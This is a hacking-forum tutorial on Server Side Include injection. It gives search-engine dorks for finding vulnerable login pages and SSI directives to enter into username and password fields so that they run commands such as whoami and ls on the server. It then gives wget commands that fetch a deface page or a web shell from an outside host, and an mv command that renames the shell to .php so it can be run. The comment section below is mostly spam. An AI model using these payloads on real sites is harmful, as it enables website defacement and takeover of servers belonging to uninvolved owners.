SSI (Server Side Include) Injection, Shell and Deface Page uploading Tutorial - SSI - Web Hacking - Hacking - GeniusHackers.Net
Main » Articles » Web Hacking » SSI

SSI (Server Side Include) Injection, Shell and Deface Page uploading Tutorial
SSI (Server Side Include) is a web application exploit, you can put your codes remotely to vulnerable websites.
Server Side Include allowed you to upload files in multi extensions, but in .php extension you can't execute your shell, you have to rename shell.txt to shell.php
Lets Begin ....

Dorks 

inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
Try any dork or find sites manually,
To check vulnerability of websites enter these commands in Username and Password

<!--#echo var="DATE_LOCAL" -->
It Will show the Date

<!--#exec cmd="whoami"-->
It Will display which user is running on the server

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre> (Linux)
It Will show all files in the directory

<!-- #exec cmd="dir" --> (Windows)
It Will display all files in the directory
 
For example enter
<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
In Username and Password to view all files of website
 
Now we have to upload our Deface page or Shell.
To upload a deface page, host/upload your deface page anywhere
you can use pastehtml.com for it,
then enter this command in Username and Password
<!--#exec cmd="wget http://website.com/deface.html" -->
To view your Deface page goto site.com/deface.html

To upload a Shell on website you have to host your shell anywhere in .txt format
then enter this command in login
<!--#exec cmd="wget http://website.com/abc.txt" -->
to check your txt file is uploaded or not list all files using

<pre><!--#exec cmd="ls -a" --></pre><!--#exec cmd="ls -a" --></pre>
Now you have to chnage .txt extention to .php
to rename your txt file to php use this command
<!--#exec cmd="mv abc.txt abc.php" -->
Now goto site.com/abc.php and acess your shell :)
Live demo

(Please don't harm to site upload your files for test only  ! Thanks )
Category: SSI | Added by: max_hacker (12.07.09)
Views: 1714 | Comments: 3 | Rating: 5.0/1
Total comments: 3
0   Spam
3 pletcherapx   (12.12.27 4:25 PM)
|

0   Spam
2 opibionee   (12.11.26 7:53 PM)
http://www.thisnext.com/item....share=1 Consult books to see what experts think. A classic is "Color Me Beautiful" by Carole Jackson is an excellent reference. Remember, the idea shape for any woman is the hourglass. The rest of us just roll our eyes and think, get it! You have a nice stomach! It extremely tacky. This 80s trend shouldn be worn anymore. It needs to remain in the history textbooks as a classic example of bad fashion taste. Have you seen that Ugg is even now the hottest boots about the world broad web now. when you do some searches about the world broad web you can anticipate to simply come across a inexpensive pair of non-authentic you may see their boots created in somewhere. But the fact is 99% with the boots have been created in yet another place. http://strainlinks.com/story.p....d-lover s-at-low-rates#c59 From the earlier situations UGG boots are preferred during the vogue planet along with the exclusive layout and exterior make all women crazy. As a way to indicate their very own vogue character, far more celebrities to put on vogue UGG boots. Due to their style wanting, these UGG boots will likely be quick for being viewed during the luxurious boots shops. http://linkingjunction.com/story.p....lbourne An ESPN Sports poll this week reflected that, for the first time, Tebow was the most popular athlete in the country. And Brady's not too shabby. He came in No. The most fascinating and unusual shoes for ladies these days is UGG boots. They are also probably the most acknowledged sort of sheepskin boots. They are frequently employed with out any socks also it feels quite comfortable. http://floristmiamifl.info/story.p....g-boots I have another suggestion. I don think random people should be allowed to contact users unless, that user has added them as a friend. This is how Twitter works, therefore you not getting so much spam everyday. The best strategy to convince kids of wearing their boots at all times, is to let them be actively involved in the selection process. For some consumers, simplicity is the most important factor to consider when buying new shoes and lace free options are among the best for them. But in the case of others, how they look is extremely relevant; this is a little more complicated with girls.. nikezrc1115

0   Spam
1 Pr0b0t   (12.07.09 5:06 PM)
really nice

Only registered users can add comments.
[ Registration | Login ]
Recommend on Google

Designed By [#]./3X3.R()()T
Like Us on Facebook Follow Us on Twitter Subscribe Us on Youtube WWW.GeniusHackers.NET © 2016
Founder and CEO of GeniusHackers [#] /3x3.R()()T
Hosted by uCoz
Hosted by uCoz